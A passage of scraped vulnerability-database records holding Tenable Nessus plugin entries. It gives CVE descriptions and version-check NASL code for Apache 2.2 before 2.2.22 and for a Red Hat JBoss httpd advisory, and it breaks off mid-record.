value:\"2013/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_space\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Junos_Space/version\");\n\n exit(0);\n}\n\ninclude(\"junos.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit('Host/Junos_Space/version');\n\ncheck_junos_space(ver:ver, fix:'13.1R1.6', severity:SECURITY_WARNING, min:'11.1', xss:TRUE);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:58:59", "description": "Versions of Apache 2.2 earlier than 2.2.22 are potentially affected by the following vulnerabilities :\n\n - When configured as a reverse proxy, improper use of the RewriteRule and ProxyPasssMatch directives could cause the web server to proxy requests to arbitrary hosts. This could allow a remote attacker to indirectly send request to intranet servers. (CVE-2011-3368, CVE-2011-4317)\n\n - A heap-based buffer overflow exists when mod_setenvif module is enabled and both a maliciously crafted 'SetEnvIf' directive and a maliciously crafted HTTP request header are used. (CVE-2011-3607)\n\n - A format string handling error can allow the server to be crashed via maliciously crafted cookies. (CVE-2012-0021)\n\n - An error exists in 'scoreboard.c' that can allow local attackers to crash the server during shutdown. (CVE-2012-0031)\n\n - An error exists in 'protocol.c' that can allow 'HTTPOnly' cookies to be exposed to attackers through the malicious use of either long or malformed HTTP headers. (CVE-2012-0053)\n\n - An error in the mod_proxy_ajp module when used to connect to a backend server that takes an overly long time to respond could lead to a temporary denial of service. (CVE-2012-4557)", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2012-02-06T00:00:00", "type": "nessus", "title": "Apache 2.2 < 2.2.22 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0021", "CVE-2011-3368", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2011-4317", "CVE-2012-4557"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:apache:http_server:2.2:*:*:*:*:*:*:*"], "id": "6302.PRM", "href": "https://www.tenable.com/plugins/nnm/6302", "sourceData": "Binary data 6302.prm", "cvss": {"score": 5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:59:01", "description": "According to its banner, the version of Apache 2.2.x installed on the remote host is prior to 2.2.22. It is, therefore, potentially affected by the following vulnerabilities :\n\n - When configured as a reverse proxy, improper use of the RewriteRule and ProxyPassMatch directives could cause the web server to proxy requests to arbitrary hosts.\n This could allow a remote attacker to indirectly send requests to intranet servers.\n (CVE-2011-3368, CVE-2011-4317)\n\n - A heap-based buffer overflow exists when mod_setenvif module is enabled and both a maliciously crafted 'SetEnvIf' directive and a maliciously crafted HTTP request header are used. (CVE-2011-3607)\n\n - A format string handling error can allow the server to be crashed via maliciously crafted cookies.\n (CVE-2012-0021)\n\n - An error exists in 'scoreboard.c' that can allow local attackers to crash the server during shutdown.\n (CVE-2012-0031)\n\n - An error exists in 'protocol.c' that can allow 'HTTPOnly' cookies to be exposed to attackers through the malicious use of either long or malformed HTTP headers. (CVE-2012-0053)\n\n - An error in the mod_proxy_ajp module when used to connect to a backend server that takes an overly long time to respond could lead to a temporary denial of service. (CVE-2012-4557)\n\nNote that Nessus did not actually test for these flaws, but instead has relied on the version in the server's banner.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2012-02-02T00:00:00", "type": "nessus", "title": "Apache 2.2.x < 2.2.22 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-4557"], "modified": "2018-06-29T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_2_2_22.NASL", "href": "https://www.tenable.com/plugins/nessus/57791", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57791);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/06/29 12:01:03\");\n\n script_cve_id(\n \"CVE-2011-3368\",\n \"CVE-2011-3607\",\n \"CVE-2011-4317\",\n \"CVE-2012-0021\",\n \"CVE-2012-0031\",\n \"CVE-2012-0053\",\n \"CVE-2012-4557\"\n );\n script_bugtraq_id(49957, 50494, 50802, 51407, 51705, 51706, 56753);\n\n script_name(english:\"Apache 2.2.x < 2.2.22 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version in Server response header.\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apache 2.2.x installed on the\nremote host is prior to 2.2.22. It is, therefore, potentially affected\nby the following vulnerabilities :\n\n - When configured as a reverse proxy, improper use of the\n RewriteRule and ProxyPassMatch directives could cause\n the web server to proxy requests to arbitrary hosts.\n This could allow a remote attacker to indirectly send\n requests to intranet servers.\n (CVE-2011-3368, CVE-2011-4317)\n\n - A heap-based buffer overflow exists when mod_setenvif\n module is enabled and both a maliciously crafted \n 'SetEnvIf' directive and a maliciously crafted HTTP \n request header are used. (CVE-2011-3607)\n\n - A format string handling error can allow the server to\n be crashed via maliciously crafted cookies.\n (CVE-2012-0021)\n\n - An error exists in 'scoreboard.c' that can allow local\n attackers to crash the server during shutdown.\n (CVE-2012-0031)\n\n - An error exists in 'protocol.c' that can allow \n 'HTTPOnly' cookies to be exposed to attackers through\n the malicious use of either long or malformed HTTP\n headers. (CVE-2012-0053)\n\n - An error in the mod_proxy_ajp module when used to \n connect to a backend server that takes an overly long \n time to respond could lead to a temporary denial of \n service. (CVE-2012-4557)\n\nNote that Nessus did not actually test for these flaws, but instead \nhas relied on the version in the server's banner.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://archive.apache.org/dist/httpd/CHANGES_2.2.22\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_22.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apache version 2.2.22 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"install_func.inc\");\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", port:port, exit_if_unknown_ver:TRUE);\n\n# Check if we could get a version first, then check if it was\n# backported\nversion = get_kb_item_or_exit('www/apache/'+port+'/version', exit_code:1);\nbackported = get_kb_item_or_exit('www/apache/'+port+'/backported', exit_code:1);\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"Apache\");\nsource = get_kb_item_or_exit('www/apache/'+port+'/source', exit_code:1);\n\n# Check if the version looks like either ServerTokens Major/Minor\n# was used\nif (version =~ '^2(\\\\.2)?$') exit(1, \"The banner from the Apache server listening on port \"+port+\" - \"+source+\" - is not granular enough to make a determination.\");\n\nfixed_ver = '2.2.22';\nif (version =~ '^2\\\\.2' && ver_compare(ver:version, fix:fixed_ver) == -1)\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, install[\"version\"]);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-16T14:12:11", "description": "Updated httpd packages that fix multiple security issues and one bug are now available for JBoss Enterprise Web Server 1.0.2 for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server ('httpd') is the namesake project of The Apache Software Foundation.\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal Server Error' response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3348)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA NULL pointer dereference flaw was found in the httpd mod_log_config module. In configurations where cookie logging is enabled, a remote attacker could use this flaw to crash the httpd child process via an HTTP request with a malformed Cookie header. (CVE-2012-0021)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nRed Hat would like to thank Context Information Security for reporting the CVE-2011-3368 issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1329 update introduced a regression in the way httpd handled certain Range HTTP header values. This update corrects this regression. (BZ#749071)\n\nAll users of JBoss Enterprise Web Server 1.0.2 should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, users must restart the httpd service for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : JBoss Web Server (RHSA-2012:0542)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368", "CVE-2011-3607", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2012-0542.NASL", "href": "https://www.tenable.com/plugins/nessus/78923", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0542. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78923);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49616, 49957, 50494, 51407, 51705, 51706);\n script_xref(name:\"RHSA\", value:\"2012:0542\");\n\n script_name(english:\"RHEL 5 / 6 : JBoss Web Server (RHSA-2012:0542)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues and one bug\nare now available for JBoss Enterprise Web Server 1.0.2 for Red Hat\nEnterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server ('httpd') is the namesake project of The Apache\nSoftware Foundation.\n\nIt was discovered that the Apache HTTP Server did not properly\nvalidate the request URI for proxied requests. In certain\nconfigurations, if a reverse proxy used the ProxyPassMatch directive,\nor if it used the RewriteRule directive with the proxy flag, a remote\nattacker could make the proxy connect to an arbitrary server, possibly\ndisclosing sensitive information from internal web servers not\ndirectly accessible to the attacker. (CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an 'Internal\nServer Error' response when processing certain malformed HTTP\nrequests, which caused the back-end server to be marked as failed in\nconfigurations where mod_proxy was used in load balancer mode. A\nremote attacker could cause mod_proxy to not send requests to back-end\nAJP (Apache JServ Protocol) servers for the retry timeout period or\nuntil all back-end servers were marked as failed. (CVE-2011-3348)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA NULL pointer dereference flaw was found in the httpd mod_log_config\nmodule. In configurations where cookie logging is enabled, a remote\nattacker could use this flaw to crash the httpd child process via an\nHTTP request with a malformed Cookie header. (CVE-2012-0021)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nRed Hat would like to thank Context Information Security for reporting\nthe CVE-2011-3368 issue.\n\nThis update also fixes the following bug :\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1329 update\nintroduced a regression in the way httpd handled certain Range HTTP\nheader values. This update corrects this regression. (BZ#749071)\n\nAll users of JBoss Enterprise Web Server 1.0.2 should upgrade to these\nupdated packages, which contain backported patches to correct these\nissues. After installing the updated packages, users must restart the\nhttpd service for the update to take effect.\"\n );\n # https://rhn.redhat.com/errata/R
[ MDVSA-2011:144 ] apache
